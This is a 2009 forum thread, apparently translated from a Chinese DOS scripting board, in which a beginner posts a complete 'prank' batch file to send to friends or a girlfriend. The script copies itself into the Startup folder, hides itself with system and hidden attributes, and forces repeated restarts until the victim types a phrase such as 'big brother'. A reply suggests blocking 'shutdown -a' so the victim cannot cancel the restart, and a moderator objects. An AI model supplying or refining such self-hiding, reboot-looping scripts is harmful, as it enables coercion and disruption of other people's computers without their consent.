China DOS Union

-- Unite DOS · Advance DOS · Grow DOS --

Union site: www.cn-dos.net Forum site: www.cn-dos.net/forum
DOS stands for freedom, openness and progress. Let us work hard, learn from the openness and GNU spirit of FreeDOS and Linux, and together build and grow a free GNU GPL world!

中国DOS联盟论坛
The time now is 2026-08-13 00:49
中国DOS联盟论坛 » DOS批处理 & 脚本技术(批处理室) » Self-made [Prank.BAT] View 1,975 Replies 7
Original Poster Posted 2009-12-15 16:24 ·  中国 山东 德州 联通
新手上路
Credits 5
Posts 4
Joined 2009-11-19 14:48
16-year member
UID 154975
Gender Male
Status Offline
Just came into contact with BAT and made a small program by myself for everyone to have fun.
You can send it to your friends or girlfriend heh heh
Let them have to enter a certain word. For example: big brother, husband. dear````
If they don't enter, the computer will be shut down and restarted, and after restarting, they still have to enter. If they don't enter, restart again [hehe, so mean]
Hope experts can also give me some suggestions, see what needs to be modified and improved, thank you.
Copy the following code into Notepad and save it as egao.bat [the name must be correct, otherwise the function won't be realized]
Okay, here's the main text:


@echo off
title Xiaofeng Production
copy egao.bat "%userprofile%\「Start」Menu\Programs\Startup\"
rem Copy this file to the startup menu
attrib +s +h +r "%userprofile%\「Start」Menu\Programs\Startup\egao.bat"
rem Add read-only, system, hidden attributes to the file
COLOR 3f
MODE con COLS=41 LINES=18
rem Modify the color and size of the window
shutdown -r -t 300 -c ""Enter the two characters [big brother] in the left column to cancel the shutdown------------------------You can also enter the pinyin [dage]
rem Start the system to shut down after 300 seconds and the text to display Note: The displayed text can be modified, such as changing big brother to husband

:c
ECHO =========================================
echo Hehe. Say big brother quickly, if you don't say it, your computer will be shut down, say it quickly! !
ECHO =========================================
rem The displayed text Note: Here you can modify it yourself, such as changing it to little darling. Say husband quickly
set /p dage=Please enter


if /i '%dage%'=='big brother' goto a
if /i '%dage%'=='dage' goto a
rem Judge whether the input is correct, if correct, jump to segment a Note: This also needs to be changed


echo Hehe","say quickly, I don't have so much patience
pause
cls
goto c
rem If the input is wrong, return to segment c

:a
echo Haha, enjoyable!
shutdown -a
rem Cancel the shutdown
pause
Recent Ratings for This Post ( 1 in total) Click for details
RaterScoreTime
qinchun36 +1 2009-12-15 16:49
Floor 2 Posted 2009-12-15 16:49 ·  中国 北京 中电华通通信有限公司
高级用户
★★★
据说是李先生
Credits 609
Posts 400
Joined 2008-04-23 15:55
18-year member
UID 116706
Gender Male
Status Offline
Ah, you can write to this level when you just started learning. Not bad. You can notice details and your thinking is clear. Add one point for encouragement! (:lol: Don't think it's little, it's your total assets)
┏━━━━━━┓
┃据说是李先生┃
┠──────┨
┃*ntRSS┃
┗━━━━━━┛
Floor 3 Posted 2009-12-15 19:55 ·  美国 惠普HP
版主
★★★★★
Credits 9,023
Posts 5,017
Joined 2007-05-31 19:39
19-year member
UID 89899
Gender Male
Status Offline
Batch processing is not for pranks. It is suggested that beginners keep a proper mindset.
Floor 4 Posted 2009-12-15 20:43 ·  中国 广东 广州 天河区 电信
银牌会员
★★★★
SuperCleaner
Credits 2,362
Posts 1,133
Joined 2008-02-02 21:36
18-year member
UID 110072
Gender Male
Status Offline
Don't know what to do: Forcibly power off and then boot from the Linux desktop, never going back to Windows haha~

YY ends.

[ Last edited by 523066680 on 2009-12-15 at 21:00 ]
Floor 5 Posted 2009-12-15 21:06 ·  中国 河北 唐山 联通
初级用户
Credits 29
Posts 17
Joined 2009-06-02 06:03
17-year member
UID 146516
Gender Male
Status Offline
Floor 6 Posted 2009-12-15 21:42 ·  中国 山东 德州 联通
新手上路
Credits 5
Posts 4
Joined 2009-11-19 14:48
16-year member
UID 154975
Gender Male
Status Offline
Thanks to the friend on the 2nd floor.
The moderator is quite serious, heh heh
Floor 7 Posted 2009-12-15 22:56 ·  中国 江苏 苏州 电信
初级用户
★★
Credits 133
Posts 75
Joined 2008-08-03 01:08
18-year member
UID 122677
Gender Male
Status Offline
It would be better if the LZ can use DOSKEY to block SHUTDOWN (DOSKEY SHUTDOWN=123). When entering "大哥", restore SHUTDOWN (DOSKEY SHUTDOWN=) to prevent others from using this SHUTDOWN -A to cancel it by themselves. Hehe, really mischievous!!!
Floor 8 Posted 2009-12-23 11:00 ·  中国 四川 德阳罗江县 电信
初级用户
剪不掉の情
Credits 46
Posts 37
Joined 2009-12-20 17:57
16-year member
UID 157000
Gender Male
Status Offline
"%userprofile%\「Start」Menu\Programs\Startup\"

Can this code be entered directly as an address?
Forum Jump: